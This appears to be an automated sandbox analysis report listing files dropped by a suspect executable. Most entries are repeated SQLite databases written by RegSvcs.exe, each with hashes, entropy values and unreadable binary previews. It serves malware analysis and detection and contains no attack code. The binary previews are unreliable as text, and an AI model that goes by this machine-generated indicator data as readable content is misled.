                                                                                Preview:EA06..~...84.6.N....n..Q....J-j...V.U.h.ni...O..4.Q~..o.....kp<.N.".O.....E(.H.S.\.G?..e....w\.H.....n.Mer..^.[..'f=w.R...7........(..u.eZ.T)..(..#..]F.p...j.Q.. ..-j..i.H..@..<.7...+.M.Wj4...J.Tk.....hwu.. ....N..:.lmF.].....~.u..G...J.N.D.....K.3....6.... .rsQ....z..WI..3...'/..!V..&u.._..."Y$r..eN....P.&d.....P..T.u..<.6..jT.;.....UF..NCh..H....U.....j...W$@.e..0.Rj4...Y..)..{iW..*..=j.D.....-B.E..)S*...u..[.).*.2.Wh.N...D..j3....p.`h.J...4.R.s.6.D......N.Q.]s.:}..g.. . .r..P.\9...h.R........Nj....f.V...J.Q....p..L.. .z...N..+....Q.....T.O.N$.-.Rg[.Qj..D..C.Q...5$......m0....:.*.R....J.= ...P...6.. .Z%F.Z......>.3..T..."Of..ez.f.Q.VN..eZ..3..mF.m.....h..?..%S. ..y..:.W...T.u/.:.*|..M.@3.Z.]..d <%z.R.T)t*ER.g.......i_..$....E.Qo5..RC&.u+.j..CP.N#T...K.N. .8.U..+.x...Q..m..Z.Y.*..T....:ej.O..*....Q.S.T.t..Y..*......H......L..*...+.\..R..X..1..).K.../..v.J]*.K...K.<.i..j.........F..r....4....K.J.1..)..]..Q.M..#....4.itZ.C... .....M%5@
                                                                                Process:C:\Users\user\Desktop\K3xL5Xy0XS.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):97792
                                                                                Entropy (8bit):6.861149961702125
                                                                                Encrypted:false
                                                                                SSDEEP:1536:G2UZPzfXtYQINw8ybnCy+db9P1wUyHjspYXI0UIlRF4P9tmKSccw:G9Zr/tY7NMbJ+djWspi8Il74PPmKSe
                                                                                MD5:F5C9A33F3F5423261FDB469888A27AD1
                                                                                SHA1:92F3D0ED439F262CDF227634CAAD344EBE051834
                                                                                SHA-256:06AE01D8BDD43054455D69A52FE04D05DC1F5BEF9493254D1A09CACEC5E7FA79
                                                                                SHA-512:1CFE459BCA1B4DC1447C9A1A12EBA7804E5BC58AC6DCAFEECB91957983D5C76E7BBF4E52DF97AC5F0DB0EC97BE66D2B51F127C084A3E104805EAE07F3F69022B
                                                                                Malicious:false
                                                                                Reputation:low
                                                                                Preview:...MSMQNAZON.JQ.PMQNEZO.2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQN.ZON<E._M.D.o.[...."8>p=#!"(.#.9+?#?9q, z=;\z#?m...n(5++.WG[iPMQNEZO.wZJ.LSM..I.ON2ZJQMP.QLDQN~2Z>PMPEQNEZON..KQMpMQNEZON2.JQmPMQLEZKN2ZJQMPIQNEZON2Z.PMPOQNEZON1Z..MP]QNUZON2JJQ]PMQNEZ_N2ZJQMPMQNE..O2.JQMP.PN.^ON2ZJQMPMQNEZON2ZJQ.QM]NEZON2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQnEZGN2ZJQMPMQNERoN2.JQMPMQNEZON../)9PMQz6[ON.ZJQ9QMQLEZON2ZJQMPMQNEzONRt8"?3MQN.^ON2.KQMVMQN3[ON2ZJQMPMQNEZ.N2.d#(<"2NEVON2Z.PMPOQNE&NN2ZJQMPMQNEZO.2Z.QMPMQNEZON2ZJQMP].OEZON2.JQMRMTN..ON..JQNPMQ.EZIN2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQNEZON2ZJQMPMQUuSOn1ZJPMP\"OEZED0$IQMTh|Yc$MN2^.W]PMW=GZOD..IQMTePNEq J2Z@Zu.OQNB5JN2P]FT.EQND.YQ8.CQMQh.DDZKf4ZJ[>WMQD..XP.SJQLu.SOE^gH2Z@"JPM[.`BR.;ZJPh.JPNArIN2P9VMPG.fD[OH]RJQG\u.LEZ]L.SJQG]>XNE\\JAvKQKCH@J;PON8'KQMT3[NEP\H#^C"FPM[fIZOD]WJQG-LQNAKK53ZJUR_.XNE[j. [JUeVMQD6]ON85DQMZaKP.SON3...MPIyHEZE=5ZJ[^Vf.GZd.G2ZKt..MQJm\ON8)MQMZ?PNE*1D2Z@yBPM[fUZOD]TJQG}C@J>[ON6rNPMVf]_A!NN2^bRLPKBHT\g_2Z@k.QMQ_CL \2Z@BEBEy]EZE!
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Reputation:high, very likely benign file
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):106496
                                                                                Entropy (8bit):1.1358696453229276
                                                                                Encrypted:false
                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                Category:dropped
                                                                                Size (bytes):49152
                                                                                Entropy (8bit):0.8180424350137764
                                                                                Encrypted:false
                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1026
                                                                                Entropy (8bit):4.699434772658264
                                                                                Encrypted:false
                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                Malicious:false
